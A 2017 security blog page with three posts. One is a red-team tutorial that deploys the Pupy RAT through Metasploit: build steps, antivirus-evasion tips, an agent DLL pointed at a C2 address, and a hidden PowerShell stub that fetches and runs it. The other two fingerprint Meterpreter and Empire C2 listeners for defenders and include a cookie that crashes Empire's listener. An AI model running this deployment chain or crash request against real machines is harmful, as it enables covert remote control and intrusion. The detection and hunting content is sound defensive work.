
Wednesday, November 8, 2017

Pupy as a Metasploit Payload

Introduction

Pupy, by N1nj4sec, is an open source, cross-platform, modular Remote Administration Tool (RAT) and post-exploitation toolkit written in Python. It bundles all dependencies into a single PE or reflective DLL for execution on Windows environments. By utilizing the DLL feature, we can easily plug it into Metasploit as an exploit payload (for any exploit that supports dllinject as a payload). This allows Red Teams to shift agents easily in order to avoid detection due to reused Indicators of Compromise (IoCs).

Installing Pupy

We'll go ahead and grab virtualenv, if it isn't already installed. From there we'll initialize all of the submodules and get ready to recompile the payloads. There are precompiled payloads available, but these are more likely to set off antivirus. It's generally best practice to compile everything yourself anyway, unless you're going for anti-attribution. Yes, Blue Teams like to write people off as script kiddies too.

Note: Don't underestimate your enemy based on initial analysis.

sudo apt-get install virtualenv libssl-dev python-dev git
git clone https://github.com/n1nj4sec/pupy.git pupy
cd pupy
virtualenv ./
. ./bin/activate
git submodule init
git submodule update
pip install -r pupy/requirements.txt

If you have issues installing M2Crypto from pip, I'd recommend installing it from your distro's packages and using that copy. Also, remove the m2crypto line from pupy/requirements.txt.

sudo apt-get install python-m2crypto
ln -s /usr/lib/python2.7/dist-packages/M2Crypto lib/python2.7/site-packages/M2Crypto

Build binaries

As previously discussed, we will compile our own payload template binaries. If this is your first time running the buildenv.sh script, it will take a few minutes to grab all of the mingw packages required for cross-compiling the templates. Many of the shellcode stubs are taken directly from metasploit/meterpreter projects, and will cause AV to flag a lot of the template files. I highly recommend spending 30 minutes or so to tweak the techniques, as it will go a long way towards AV evasion. Unfortunately, there is no master config for network signatures, but all transport modules are written in Python which can be found in pupy/network/transports and are generally easy to modify.

The following commands will populate the templates located in pupy/payload_templates.

# If you don't currently have multiarch, install it now.
sudo dpkg --add-architecture i386 && sudo apt-get update
cd client/sources
./buildenv.sh
./build.sh

Generate Agent DLL

Metasploit currently requires us to generate x86 binaries, so we'll stick with that for generating our pupy DLL. This will allow us to use any of Metasploit's DLL stubs, or to use the DLL directly when throwing exploits. For the sake of demonstration, we will stick to executing a PowerShell one-liner that retrieves and executes the DLL through Metasploit.

Generate the pupy agent using the following line. Replace the IP address with your C2 node IP or hostname.

cd ../../pupy
./pupygen.py -O windows -A x86 -f client -S --randomize-hash auto_proxy --transport http --host 192.168.1.138:8080

Start Pupy Listener

We still need to get the metasploit stub ready, but go ahead and start a pupysh session using the same transport and port from above.

./pupysh.py -t http --port 8080

Generate Agent Stub

Start up msfconsole, and generate the stub by using the following commands.

use payload/windows/dllinject/reverse_http
set DLL ~/pupy/pupy/pupyx86.AUbLKU.dll
set LHOST 192.168.1.138
set LPORT 9090
generate -t psh-cmd

If all went well, you should have something similar to the following.

powershell.exe -nop -w hidden -e <base64-encoded stub>

Set up Payload Delivery in Metasploit

Now, we need to set up a multi/handler for delivering the DLL payload to the target. After the DLL is delivered and executed, check back in your pupy tab for a shell.

use exploit/multi/handler
set payload windows/dllinject/reverse_http
set LHOST 192.168.1.138
set LPORT 9090
exploit

Get Shells

Execute the powershell stub that we generated above on a Windows machine, and enjoy your pupy shell delivered by Metasploit.

Tuesday, April 11, 2017

Hunting Red Team Meterpreter C2 Infrastructure

Introduction

This is part 2 of hunting Red Team C2 Infrastructure. Part 1 covered finding Empire C2 end points. In this post, we will show how to do the same for Meterpreter. There were no immediate crashing bugs found in the Meterpreter HTTP/S handler, but there is still enough information to profile these end points.

Meterpreter

Meterpreter is an advanced C2 agent, often used as a payload with the popular Metasploit exploit framework. It's cross-platform and highly extensible. In this post, we will focus on finding the reverse HTTP/S handlers for Meterpreter.

Meterpreter Headers

Using the HTTP request of GET / HTTP/1.0, the following headers were returned.

HTTP/1.1 200 OK
Connection: close
Server: Apache
Content-Length: 44

What stands out here (as with Empire) is the general lack of headers that would normally be present in a response. Also, we used HTTP/1.0 as the protocol, but the reply is still HTTP/1.1.

Meterpreter default page

<html><body><h1>It works!</h1></body></html>

Hashes of default page

MD5: c7b4690c8c46625ef0f328cd7a24a0a3
SHA1: 12179caec26a089cabcbb75c4dbe0bdfe60951f7
SHA2: 8f3ff2e2482468f3b9315a433b383f0cc0f9eb525889a34d4703b7681330a3fb

Finding Meterpreter Listeners with Shodan

Shodan is a search engine for Security Researchers. They routinely scan common ports across the Internet, and make the data publicly available, and easily searchable. APIs are also provided for automating a lot of the tasks required.

Using the common headers and default web page listed above, we are able to narrow down the list of possible Meterpreter C2 node candidates on the Internet with a simple query.

'Server: Apache' 'It works!' -'Content-Type' 'Length: 44'

You'll notice that the results returned are all HTTP/1.1, matching the profile we scoped out above.

Random URLs

Another characteristic that makes Meterpreter listeners easy to identify is that every request that isn't to the backend gets the same response. Random URLs get the same response as grabbing the index, whereas a legitimate server will typically produce a 404 error.

GET /lkafjdklfjasdklfjalkdjflkajd HTTP/1.0

Changing default values

There's no excuse for leaving your C2 node exposed to the entire Internet. Whitelist IP space in order to keep your tests in scope and to avoid having other people attack your nodes. The default server name and default page discussed above are both part of the handler's advanced settings.

use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set LHOST 127.0.0.1
set LPORT 8000
show advanced
set MeterpreterServerName nginx
set HttpUnknownRequestResponse html_here

Going beyond Shodan

In case there are any questions about whether the servers found are Meterpreter listeners, the following is a valid URI that will download Stage1 of the Meterpreter session from any given reverse HTTP/S listener.

GET /huO7Mf9GbAoRFBAVSfkxDwLTm3Wcz8n3kuXycv7k4vWV-_dXg3aY1iQy83Cejls15IeYlhUZ0QMT8S1zHKR33-Ga1rVIiV6QNFjXzTgr4lwNq_YR1tqyIbl9ddVzJ8UeYWJ0MJnThtVJ7d46IZnwHYok-XXZJrhqgUaaJMQtmCGCQWFA9tXMVtZtQEaR9Hse2Muw-P5TX4M7LKtm93LLFCT5i1NshdiwcWOnVJq HTTP/1.0

As we discussed in part 1, we can use Scans.io data in order to get a broader search of HTTPS servers. If you still have a copy of the data, you can run a zgrep search like the following to identify possible C2 nodes from this data.

zgrep 'PGh0bWw+PGJvZHk+PGgxPkl0IHdvcmtzITwvaDE+PC9ib2R5PjwvaHRtbD4=' 20170221-https.gz > /tmp/results.json

This may take several minutes to run, as the datasets are generally several gigabytes in size. The result will be a file containing JSON data for each host that returned the default Meterpreter HTML. You can parse this file and extract each IP address that should be tested.

Happy hunting.

Wednesday, April 5, 2017

Hunting Red Team Empire C2 Infrastructure

Introduction

While playing around with setting up my C2 nodes and redirectors for an engagement, I decided to start poking around at both Empire and Meterpreter's default setups. The end goal of this project was to be able to positively identify nodes on the Internet that are being used actively by attackers or Red Teams with little to no scope filtering. The results were interesting, and the first time investigating revealed over twenty easy to find C2 nodes running stock Empire or Meterpreter reverse http/s sessions.

History of Failure

Coding is difficult, even for hackers. Both the Empire and Metasploit projects have a history of Remote Code Execution vulnerabilities. Red Teams need to go to great lengths to keep people from compromising their crown jewels, which include active agents and client data.

Empire RCE
Metasploit RCE

Empire

Empire, now in beta for 2.0, includes both PowerShell Empire and the Python version, EmPyre. The Empire listener is based on BaseHTTPServer in Python and provides an abstraction layer on top of it. Let's take a look at the HTTP headers that are present in the default Empire configuration.

Empire Headers

Using the HTTP request of GET / HTTP/1.1, the following headers were returned.

HTTP/1.0 200 OK
Server: Microsoft-IIS/7.5
Date: Wed, 05 Apr 2017 18:26:10 GMT

What stands out here is the general lack of headers that would normally be present in a response. Also, we used HTTP/1.1 as the protocol, but the reply is still HTTP/1.0.

Empire default page

<html><body><h1>It works!</h1><p>This is the default web page for this server.</p><p>The web server software is running but no content has been added, yet.</p></body></html>

Hashes of default page

MD5: 885ecd7910c988f1f15fcacca5e1734e
SHA1: b642227fbc703af1a67edb665241fc709ecd6f6e
SHA2: a58fb107072d9523114a1b1f17fbf5e7a8b96da7783f24d84f83df34abc48576

Finding Empire Listeners with Shodan

Shodan is a search engine for Security Researchers. They routinely scan common ports across the Internet, and make the data publicly available, and easily searchable. APIs are also provided for automating a lot of the tasks required.

Using the common headers and default web page listed above, we are able to narrow down the list of possible Empire C2 nodes on the Internet with a simple query.

'Microsoft-IIS/7.5' 'It works!' -'Content-Type' -'Set-Cookie'

You'll notice that the results returned are all HTTP/1.0, matching the profile we scoped out above.

Finding an exception in Empire

The HTTP module in Empire is located in lib/common/http.py. Go ahead and use your favorite text editor to open that up, and have a look around at the code.

In the class RequestHandler and method do_GET we have the following piece of code for handling parsing of cookie data.

if cookie:
    # search for a SESSIONID value in the cookie
    parts = cookie.split(";")
    for part in parts:
        if "SESSIONID" in part:
            # extract the sessionID value
            name, sessionID = part.split("=")

Interesting.

name, sessionID = part.split("=")

If there is more than one equal sign in the cookie field, split() keeps splitting on every one of them, so it returns more than two items and the unpacking into name and sessionID raises an exception. That line should be this:

name, sessionID = part.split("=", 1)

The maxsplit argument of 1 limits the call to a single split, so at most two items come back.

Let's go ahead and try to exploit this from the client side with the following request.

curl http://target:port --cookie 'SESSIONID=id=id'

Curl will return the following error, because Python threw an exception upon parsing the cookies.

curl: (52) Empty reply from server

Changing default values

While executing a Red Team engagement, it's always a good idea to change the default values of the tools you use, whether it be a scanner or C2 infrastructure. This will make it harder for Blue Team elements to detect portions of your activity. You should also either utilize Empire's whitelisting feature or set up a firewall in order to keep your test within scope. There is no excuse for leaving your C2 node exposed to the entire Internet.

You should have noticed while browsing http.py that the default page served is also located in that file in the function named default_page.

In order to change the default server name, you must edit the configuration in the empire.db file located in data/. Open it with:

sqlite3 data/empire.db

You can view the current setting by typing:

SELECT server_version from config;

In order to update it, something like the following will do the job.

update config set server_version = 'nginx' where server_version = 'Microsoft-IIS/7.5';

Going beyond Shodan

Scans.io is another great resource for looking at Internet-wide scans, including those of HTTPS sites. The scan sets are huge, but offer a very current view of HTTPS servers across the globe. Data is in JSON format, and the default page is saved base64-encoded within each record.

zgrep 'PGh0bWw+PGJvZHk+PGgxPkl0IHdvcmtzITwvaDE+PHA+VGhpcyBpcyB0aGUgZGVmYXVsdCB3ZWIgcGFnZSBmb3IgdGhpcyBzZXJ2ZXIuPC9wPjxwPlRoZSB3ZWIgc2VydmVyIHNvZnR3YXJlIGlzIHJ1bm5pbmcgYnV0IG5vIGNvbnRlbnQgaGFzIGJlZW4gYWRkZWQsIHlldC48L3A+PC9ib2R5PjwvaHRtbD4=' 20170221-https.gz > /tmp/results.json

This may take several minutes to run, as the datasets are generally several gigabytes in size. The result will be a file containing JSON data for each host that returned the default Empire HTML. You can parse this file and extract each IP address that should be tested, and then feed them into the script below.

Automating detection with Python

Use the following to run this script.

python3 empire_identifier.py 
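The identifier script itself is not reproduced on the page, so the following is an added example (mine, not the author's empire_identifier.py) that applies the profiles from both this post and the Meterpreter post: it matches a captured body against the SHA-256 of the two default pages quoted above, flags the HTTP-version mismatch and the thin header set, and classifies the base64-encoded bodies that the zgrep lines search for in Scans.io data. The three sample responses are constructed from the captures in the posts; no live host is contacted.

```python
import base64
import hashlib

# Default pages quoted in the two posts; hashing them here yields the digests the
# posts list, so a captured body can be matched by SHA-256 alone.
DEFAULT_PAGES = {
    "Empire": ("<html><body><h1>It works!</h1><p>This is the default web page for "
               "this server.</p><p>The web server software is running but no "
               "content has been added, yet.</p></body></html>"),
    "Meterpreter": "<html><body><h1>It works!</h1></body></html>",
}
KNOWN_HASHES = {hashlib.sha256(p.encode()).hexdigest(): n
                for n, p in DEFAULT_PAGES.items()}

def fingerprint(request_version, raw_response):
    """Profile one raw HTTP response as the posts do. request_version is the
    version we sent ("1.0" or "1.1"); returns (label_or_None, indicators)."""
    head, _, body = raw_response.partition("\r\n\r\n")
    status, *header_lines = head.split("\r\n")
    headers = {k.strip().lower(): v.strip()
               for k, v in (h.split(":", 1) for h in header_lines if ":" in h)}
    indicators = []
    label = KNOWN_HASHES.get(hashlib.sha256(body.encode()).hexdigest())
    if label:
        indicators.append("body is the %s default page" % label)
    reply_version = status.split()[0]
    if reply_version != "HTTP/" + request_version:
        indicators.append("%s reply to an HTTP/%s request" % (reply_version, request_version))
    if "content-type" not in headers:
        indicators.append("no Content-Type header")
    if len(headers) <= 3:
        indicators.append("only %d response headers" % len(headers))
    return label, indicators

def label_base64_body(b64_body):
    """Classify a base64-encoded body as stored in Scans.io records (what the zgrep lines match)."""
    return KNOWN_HASHES.get(hashlib.sha256(base64.b64decode(b64_body)).hexdigest())

# Constructed responses mirroring the captures quoted in the posts (no real hosts).
METERPRETER_SAMPLE = ("HTTP/1.1 200 OK\r\nConnection: close\r\nServer: Apache\r\n"
                      "Content-Length: 44\r\n\r\n" + DEFAULT_PAGES["Meterpreter"])
EMPIRE_SAMPLE = ("HTTP/1.0 200 OK\r\nServer: Microsoft-IIS/7.5\r\n"
                 "Date: Wed, 05 Apr 2017 18:26:10 GMT\r\n\r\n" + DEFAULT_PAGES["Empire"])
BENIGN_SAMPLE = ("HTTP/1.1 200 OK\r\nServer: nginx\r\nContent-Type: text/html\r\n"
                 "Content-Length: 14\r\nDate: Wed, 05 Apr 2017 18:26:10 GMT\r\n\r\n"
                 "<html></html>\n")

if __name__ == "__main__":
    for ver, sample in (("1.0", METERPRETER_SAMPLE), ("1.1", EMPIRE_SAMPLE), ("1.1", BENIGN_SAMPLE)):
        print(fingerprint(ver, sample))
```

A hit on the body hash alone is strong; the version mismatch and missing Content-Type are supporting signals that also survive an operator changing only the server name, as the Changing default values section suggests.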

Happy hunting, a future post will detail similar experiences with Meterpreter.